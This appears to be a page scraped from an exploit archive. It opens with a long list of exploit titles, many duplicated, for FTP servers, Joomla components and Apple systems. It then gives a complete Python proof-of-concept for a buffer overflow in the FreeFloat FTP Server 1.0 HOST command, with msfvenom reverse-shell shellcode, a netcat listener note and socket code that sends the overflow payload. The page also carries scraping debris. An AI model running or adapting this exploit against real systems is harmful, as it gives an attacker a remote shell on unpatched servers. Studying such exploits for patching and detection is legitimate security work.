c76e893f94
12 new exploits KarjaSoft Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow (PoC) KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (PoC) KarjaSoft Sami FTP Server 2.0.2 - (USER/PASS) Remote Buffer Overflow KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow Apple iOS 4.0.3 - DPAP Server Denial of Service KarjaSoft Sami FTP Server 2.02 - USER Overflow (Metasploit) KarjaSoft Sami FTP Server 2.0.2 - USER Remote Buffer Overflow (Metasploit) Freefloat FTP Server - (LIST command) Buffer Overflow Freefloat FTP Server - 'LIST' Command Buffer Overflow Freefloat FTP Server 1.00 - MKD Buffer Overflow Freefloat FTP Server - MKD Buffer Overflow (Metasploit) Freefloat FTP Server 1.0 - 'MKD' Buffer Overflow Freefloat FTP Server - 'MKD' Buffer Overflow (Metasploit) Freefloat FTP Server 1.0 - REST & PASV Buffer Overflow Freefloat FTP Server 1.0 - 'REST' / 'PASV' Buffer Overflow Freefloat FTP Server - REST Buffer Overflow (Metasploit) Freefloat FTP Server - 'REST' Buffer Overflow (Metasploit) Freefloat FTP Server 1.0 - ACCL Buffer Overflow Freefloat FTP Server 1.0 - 'ACCL' Buffer Overflow Nagios Plugin check_ups - Local Buffer Overflow (PoC) Nagios Plugins check_ups - Local Buffer Overflow (PoC) Joomla! Component KISS Advertiser - Remote File / Bypass Upload Joomla! Component 'com_ksadvertiser' - Remote File / Bypass Upload Joomla! Component OS Property 2.0.2 - Unrestricted Arbitrary File Upload Joomla! Component 'com_osproperty' 2.0.2 - Unrestricted Arbitrary File Upload Joomla! Component com_niceajaxpoll 1.3.0 - SQL Injection Joomla! Component 'com_niceajaxpoll' 1.3.0 - SQL Injection Joomla! Extension Movm Extension (com_movm) - SQL Injection Joomla! Component 'com_movm' - SQL Injection Joomla! Component joomgalaxy 1.2.0.4 - Multiple Vulnerabilities Joomla! Component 'com_joomgalaxy' 1.2.0.4 - Multiple Vulnerabilities Joomla! Component En Masse 1.2.0.4 - SQL Injection Joomla! Component 'com_enmasse' 1.2.0.4 - SQL Injection Joomla! Component FireBoard (com_fireboard) - SQL Injection Joomla! Component 'com_fireboard' - SQL Injection Joomla! Component Spider Calendar Lite (com_spidercalendar) - SQL Injection Joomla! Component 'com_spidercalendar' - SQL Injection Joomla! Component RokModule - 'index.php module Parameter' Blind SQL Injection Joomla! Component 'com_rokmodule' - 'module' Parameter Blind SQL Injection Joomla! Component iCagenda - (id Parameter) Multiple Vulnerabilities Joomla! Component 'com_icagenda' - 'id' Parameter Multiple Vulnerabilities Joomla! Component FreeStyle Support com_fss 1.9.1.1447 - SQL Injection Joomla! Component Tags - 'index.php tag Parameter' SQL Injection Joomla! Component 'com_fss' 1.9.1.1447 - SQL Injection Joomla! Component 'com_tag' - 'tag' Parameter SQL Injection Joomla! Plugin Commedia - 'index.php task Parameter' SQL Injection Joomla! Component Kunena - 'index.php search Parameter' SQL Injection Joomla! Component 'com_commedia' - 'task' Parameter SQL Injection Joomla! Component 'com_kunena' - 'search' Parameter SQL Injection Freefloat FTP Server - PUT Command Buffer Overflow Freefloat FTP Server - 'PUT' Command Buffer Overflow Joomla! Component Spider Catalog - 'index.php Product_ID Parameter' SQL Injection Joomla! Component 'com_spidercatalog' - 'Product_ID' Parameter SQL Injection Free Float FTP Server - USER Command Buffer Overflow Freefloat FTP Server - 'USER' Command Buffer Overflow Joomla! Component JooProperty 1.13.0 - Multiple Vulnerabilities Joomla! Component 'com_jooproperty' 1.13.0 - Multiple Vulnerabilities Joomla! Component Spider Calendar - 'index.php date Parameter' Blind SQL Injection Joomla! Component 'com_spidercalendar' - 'date' Parameter Blind SQL Injection Joomla! Component com_collector - Arbitrary File Upload Joomla! Component 'com_collector' - Arbitrary File Upload Freefloat FTP 1.0 - Raw Commands Buffer Overflow Freefloat FTP Server 1.0 - 'Raw' Commands Buffer Overflow Joomla! 3.0.2 - (highlight.php) PHP Object Injection Joomla! 3.0.2 - 'highlight.php' PHP Object Injection Joomla! Component RSfiles - (cid parameter) SQL Injection Joomla! Component 'com_rsfiles' - 'cid' Parameter SQL Injection Joomla! Component CiviCRM 4.2.2 - Remote Code Injection Joomla! Component 'com_civicrm' 4.2.2 - Remote Code Injection Freefloat FTP 1.0 - DEP Bypass with ROP Freefloat FTP Server 1.0 - DEP Bypass with ROP Joomla! 3.0.3 - (remember.php) PHP Object Injection Joomla! 3.0.3 - 'remember.php' PHP Object Injection Joomla! Extension DJ Classifieds 2.0 - Blind SQL Injection Joomla! Component 'dj-classifieds' 2.0 - Blind SQL Injection Joomla! Component S5 Clan Roster com_s5clanroster - 'index.php id Parameter' SQL Injection Joomla! Component 'com_s5clanroster' - 'id' Parameter SQL Injection Joomla! Component Sectionex 2.5.96 - SQL Injection Joomla! Component 'com_sectionex' 2.5.96 - SQL Injection Joomla! Component redSHOP 1.2 - SQL Injection Joomla! Component 'com_redshop' 1.2 - SQL Injection Joomla! Component Media Manager - Arbitrary File Upload (Metasploit) Joomla! Component 'com_media' - Arbitrary File Upload (Metasploit) Apple iOS Mobile Safari - Memory Exhaustion Remote Denial of Service check_dhcp - Nagios Plugins 2.0.1 - Arbitrary Option File Read Nagios Plugins check_dhcp 2.0.1 - Arbitrary Option File Read check_dhcp 2.0.2 (Nagios Plugins) - Arbitrary Option File Read Race Condition Nagios Plugins check_dhcp 2.0.2 - Arbitrary Option File Read Race Condition Apple iOS 4.0.2 - Networking Packet Filter Rules Privilege Escalation Joomla! Component IDoEditor - 'image.php' Arbitrary File Upload Joomla! Component jFancy - 'script.php' Arbitrary File Upload Joomla! Component 'IDoEditor' - 'image.php' Arbitrary File Upload Joomla! Component 'mod_jfancy' - 'script.php' Arbitrary File Upload Joomla! Component hwdVideoShare - 'flash_upload.php' Arbitrary File Upload Joomla! Component 'com_hwdvideoshare' - 'flash_upload.php' Arbitrary File Upload Joomla! Component Maian Media - 'uploadhandler.php' Arbitrary File Upload Joomla! Component JCal Pro Calendar - SQL Injection Joomla! Component 'com_maianmedia' - 'uploadhandler.php' Arbitrary File Upload Joomla! Component 'com_jcalpro' - SQL Injection Joomla! Component com_szallasok - 'id' Parameter SQL Injection Joomla! Component 'com_szallasok' - 'id' Parameter SQL Injection Joomla! Module Language Switcher 2.5.x - Multiple Cross-Site Scripting Vulnerabilities My Little Forum 2.3.7 - Multiple Vulnerabilities Joomla! Component com_hello - 'Controller' Parameter Local File Inclusion Joomla! Component 'com_hello' - 'Controller' Parameter Local File Inclusion Joomla! Component Odudeprofile - 'profession' Parameter SQL Injection Joomla! Component 'com_odudeprofile' - 'profession' Parameter SQL Injection Joomla! Component com_photo - Multiple SQL Injections Joomla! Component 'com_photo' - Multiple SQL Injections Joomla! Component CiviCRM - Multiple Arbitrary File Upload Vulnerabilities Joomla! Component 'com_civicrm' - Multiple Arbitrary File Upload Vulnerabilities Joomla! Component Komento - 'cid' Parameter SQL Injection Joomla! Component 'Komento' - 'cid' Parameter SQL Injection Joomla! Component com_quiz - SQL Injection Joomla! Component 'com_quiz' - SQL Injection Joomla! Component com_parcoauto - 'idVeicolo' Parameter SQL Injection Joomla! Component 'com_parcoauto' - 'idVeicolo' Parameter SQL Injection Joomla! Component ZT Autolinks - 'Controller' Parameter Local File Inclusion Joomla! Component Bit - 'Controller' Parameter Local File Inclusion Joomla! Component 'com_ztautolink' - 'Controller' Parameter Local File Inclusion Joomla! Component 'com_bit' - 'Controller' Parameter Local File Inclusion Joomla! Component Incapsula - Multiple Cross-Site Scripting Vulnerabilities Joomla! Component 'com_incapsula' - Multiple Cross-Site Scripting Vulnerabilities Apple Mac OSX 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation Apple Mac OSX 10.9.5/10.10.5 - rsh/libmalloc Privilege Escalation Apple Mac OSX 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation (Metasploit) Apple Mac OSX 10.9.5/10.10.5 - rsh/libmalloc Privilege Escalation (Metasploit) Joomla! Component RokDownloads - Arbitrary File Upload Joomla! Component 'com_rokdownloads' - Arbitrary File Upload Apple Intel HD 3000 Graphics driver 10.0.0 - Privilege Escalation Apple Intel HD 3000 Graphics Driver 10.0.0 - Privilege Escalation MyLittleForum 2.3.5 - PHP Command Injection My Little Forum 2.3.5 - PHP Command Injection Apple OS X Kernel - IOBluetoothFamily.kext Use-After-Free OS X/iOS Kernel - IOSurface Use-After-Free OS X/iOS - mach_ports_register Multiple Memory Safety Issues Apple OS X - Kernel IOBluetoothFamily.kext Use-After-Free Apple OS X/iOS - Kernel IOSurface Use-After-Free Apple OS X/iOS - mach_ports_register Multiple Memory Safety Issues MacOS 10.12 - 'task_t' Privilege Escalation Apple MacOS 10.12 - 'task_t' Privilege Escalation Freefloat FTP Server 1.0 - 'ABOR' Command Buffer Overflow School Registration and Fee System - Authentication Bypass Freefloat FTP Server 1.0 - 'RMD' Command Buffer Overflow Freefloat FTP Server 1.0 - 'HOST' Command Buffer Overflow KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (SEH) Freefloat FTP Server 1.0 - 'RENAME' Command Buffer Overflow MySQL / MariaDB / PerconaDB - 'mysql' System User Privilege Escalation / Race Condition MySQL / MariaDB / PerconaDB - 'root' Privilege Escalation
61 lines
2.4 KiB
Python
Executable file
61 lines
2.4 KiB
Python
Executable file
#!/usr/bin/env python
|
|
#-*- coding: utf-8 -*-
|
|
|
|
# Exploit Title: FreeFloat FTP Server HOST Command Buffer Overflow Exploit
|
|
# Date: 30/10/2016
|
|
# Exploit Author: Cybernetic
|
|
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
|
|
# Version: 1.00
|
|
# Tested on: Windows XP Profesional SP3 ESP x86
|
|
# CVE : N/A
|
|
|
|
import socket, os, sys
|
|
ret="\xC7\x31\x6B\x7E" #Shell32.dll 7E6B31C7
|
|
|
|
#Metasploit Shellcode
|
|
#msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -b '\x00\x0a\x0d' -f c
|
|
|
|
#nc -lvp 443
|
|
#Send exploit
|
|
|
|
shellcode=("\xbb\x89\x62\x48\xda\xdb\xda\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
|
|
"\x52\x31\x5a\x12\x03\x5a\x12\x83\x4b\x66\xaa\x2f\xb7\x8f\xa8"
|
|
"\xd0\x47\x50\xcd\x59\xa2\x61\xcd\x3e\xa7\xd2\xfd\x35\xe5\xde"
|
|
"\x76\x1b\x1d\x54\xfa\xb4\x12\xdd\xb1\xe2\x1d\xde\xea\xd7\x3c"
|
|
"\x5c\xf1\x0b\x9e\x5d\x3a\x5e\xdf\x9a\x27\x93\x8d\x73\x23\x06"
|
|
"\x21\xf7\x79\x9b\xca\x4b\x6f\x9b\x2f\x1b\x8e\x8a\xfe\x17\xc9"
|
|
"\x0c\x01\xfb\x61\x05\x19\x18\x4f\xdf\x92\xea\x3b\xde\x72\x23"
|
|
"\xc3\x4d\xbb\x8b\x36\x8f\xfc\x2c\xa9\xfa\xf4\x4e\x54\xfd\xc3"
|
|
"\x2d\x82\x88\xd7\x96\x41\x2a\x33\x26\x85\xad\xb0\x24\x62\xb9"
|
|
"\x9e\x28\x75\x6e\x95\x55\xfe\x91\x79\xdc\x44\xb6\x5d\x84\x1f"
|
|
"\xd7\xc4\x60\xf1\xe8\x16\xcb\xae\x4c\x5d\xe6\xbb\xfc\x3c\x6f"
|
|
"\x0f\xcd\xbe\x6f\x07\x46\xcd\x5d\x88\xfc\x59\xee\x41\xdb\x9e"
|
|
"\x11\x78\x9b\x30\xec\x83\xdc\x19\x2b\xd7\x8c\x31\x9a\x58\x47"
|
|
"\xc1\x23\x8d\xc8\x91\x8b\x7e\xa9\x41\x6c\x2f\x41\x8b\x63\x10"
|
|
"\x71\xb4\xa9\x39\x18\x4f\x3a\x86\x75\x4e\xde\x6e\x84\x50\x1f"
|
|
"\xd4\x01\xb6\x75\x3a\x44\x61\xe2\xa3\xcd\xf9\x93\x2c\xd8\x84"
|
|
"\x94\xa7\xef\x79\x5a\x40\x85\x69\x0b\xa0\xd0\xd3\x9a\xbf\xce"
|
|
"\x7b\x40\x2d\x95\x7b\x0f\x4e\x02\x2c\x58\xa0\x5b\xb8\x74\x9b"
|
|
"\xf5\xde\x84\x7d\x3d\x5a\x53\xbe\xc0\x63\x16\xfa\xe6\x73\xee"
|
|
"\x03\xa3\x27\xbe\x55\x7d\x91\x78\x0c\xcf\x4b\xd3\xe3\x99\x1b"
|
|
"\xa2\xcf\x19\x5d\xab\x05\xec\x81\x1a\xf0\xa9\xbe\x93\x94\x3d"
|
|
"\xc7\xc9\x04\xc1\x12\x4a\x34\x88\x3e\xfb\xdd\x55\xab\xb9\x83"
|
|
"\x65\x06\xfd\xbd\xe5\xa2\x7e\x3a\xf5\xc7\x7b\x06\xb1\x34\xf6"
|
|
"\x17\x54\x3a\xa5\x18\x7d")
|
|
|
|
shell= '\x90'*30 + shellcode
|
|
buffer='\x41'*247 + ret + shell + '\x43'*(696-len(shell))
|
|
|
|
print "Sending Buffer"
|
|
|
|
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
connect=s.connect(('10.10.10.10',21))
|
|
s.recv(1024)
|
|
s.send('USER test \r\n')
|
|
s.recv(1024)
|
|
s.send('PASS test \r\n')
|
|
s.recv(1024)
|
|
s.send('HOST' +buffer+ '\r\n')
|
|
s.close()
|
|
print "Attack Buffer Overflow Successfully Executed"
|
|
|